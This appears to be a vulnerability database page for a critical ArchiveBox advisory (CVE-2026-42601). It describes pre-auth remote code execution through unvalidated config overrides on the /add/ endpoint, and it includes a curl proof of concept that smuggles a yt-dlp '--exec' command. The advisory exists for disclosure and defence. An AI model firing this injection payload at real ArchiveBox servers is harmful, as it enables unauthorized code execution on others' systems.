GHSA-3H23-7824-PJ8R

Vulnerability from github – Published: 2026-05-04 21:30 – Updated: 2026-05-14 20:50
VLAI
Summary
ArchiveBox Vulnerable to RCE via unvalidated per-crawl config overrides in AddView
Details

The /add/ endpoint (AddView in core/views.py) accepts a config JSON field that gets merged into the crawl config without validation. This config is exported as environment variables when archive plugins run, allowing injection of arbitrary tool arguments to achieve RCE.

When PUBLIC_ADD_VIEW=True (common for bookmarklet usage), this is exploitable without authentication. The endpoint is also @csrf_exempt.

Affected code:

core/views.py:887 - user config extracted with no validation:

custom_config = form.cleaned_data.get("config") or {}

core/views.py:918 - merged into crawl config:

config.update(custom_config)

config/configset.py:255-256 - crawl config applied with high priority:

if crawl and hasattr(crawl, "config") and crawl.config:
    config.update(crawl.config)

hooks.py:398-411 - config exported as env vars:

for key, value in config.items():
    if key in SKIP_KEYS: continue
    env[key] = str(value)

plugins/ytdlp/on_Snapshot__02_ytdlp.bg.py:122-123 - env var args passed to yt-dlp:

ytdlp_args_extra = get_env_array("YTDLP_ARGS_EXTRA", [])
cmd.extend(ytdlp_args_extra)

PoC (pre-auth when PUBLIC_ADD_VIEW=True):

curl -X POST http://localhost:8000/add/ \
  -d "url=https://www.youtube.com/watch?v=dQw4w9WgXcQ" \
  -d "depth=0" \
  -d "config={\"YTDLP_ARGS_EXTRA\": \"[\\\"--exec\\\", \\\"id > /tmp/pwned\\\"]\"}" 

After the crawl runs, yt-dlp executes id > /tmp/pwned via its --exec flag.

Same approach works with GALLERYDL_ARGS_EXTRA (gallery-dl --exec), or overriding any *_BINARY key.

Impact: Remote code execution on the ArchiveBox server. Pre-auth when PUBLIC_ADD_VIEW=True.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "archivebox"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.8.6rc0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42601"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-88"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-04T21:30:19Z",
    "nvd_published_at": "2026-05-09T20:16:29Z",
    "severity": "CRITICAL"
  },
  "details": "The /add/ endpoint (AddView in core/views.py) accepts a config JSON field that gets merged into the crawl config without validation. This config is exported as environment variables when archive plugins run, allowing injection of arbitrary tool arguments to achieve RCE.\n\nWhen PUBLIC_ADD_VIEW=True (common for bookmarklet usage), this is exploitable without authentication. The endpoint is also @csrf_exempt.\n\nAffected code:\n\ncore/views.py:887 - user config extracted with no validation:\n\n```python\ncustom_config = form.cleaned_data.get(\"config\") or {}\n```\n\ncore/views.py:918 - merged into crawl config:\n\n```python\nconfig.update(custom_config)\n```\n\nconfig/configset.py:255-256 - crawl config applied with high priority:\n\n```python\nif crawl and hasattr(crawl, \"config\") and crawl.config:\n    config.update(crawl.config)\n```\n\nhooks.py:398-411 - config exported as env vars:\n\n```python\nfor key, value in config.items():\n    if key in SKIP_KEYS: continue\n    env[key] = str(value)\n```\n\nplugins/ytdlp/on_Snapshot__02_ytdlp.bg.py:122-123 - env var args passed to yt-dlp:\n\n```python\nytdlp_args_extra = get_env_array(\"YTDLP_ARGS_EXTRA\", [])\ncmd.extend(ytdlp_args_extra)\n```\n\nPoC (pre-auth when PUBLIC_ADD_VIEW=True):\n\n```bash\ncurl -X POST http://localhost:8000/add/ \\\n  -d \"url=https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \\\n  -d \"depth=0\" \\\n  -d \"config={\\\"YTDLP_ARGS_EXTRA\\\": \\\"[\\\\\\\"--exec\\\\\\\", \\\\\\\"id \u003e /tmp/pwned\\\\\\\"]\\\"}\" \n```\n\nAfter the crawl runs, yt-dlp executes id \u003e /tmp/pwned via its --exec flag.\n\nSame approach works with GALLERYDL_ARGS_EXTRA (gallery-dl --exec), or overriding any *_BINARY key.\n\nImpact: Remote code execution on the ArchiveBox server. Pre-auth when PUBLIC_ADD_VIEW=True.",
  "id": "GHSA-3h23-7824-pj8r",
  "modified": "2026-05-14T20:50:08Z",
  "published": "2026-05-04T21:30:19Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ArchiveBox/ArchiveBox/security/advisories/GHSA-3h23-7824-pj8r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42601"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ArchiveBox/ArchiveBox"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "ArchiveBox Vulnerable to RCE via unvalidated per-crawl config overrides in AddView"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…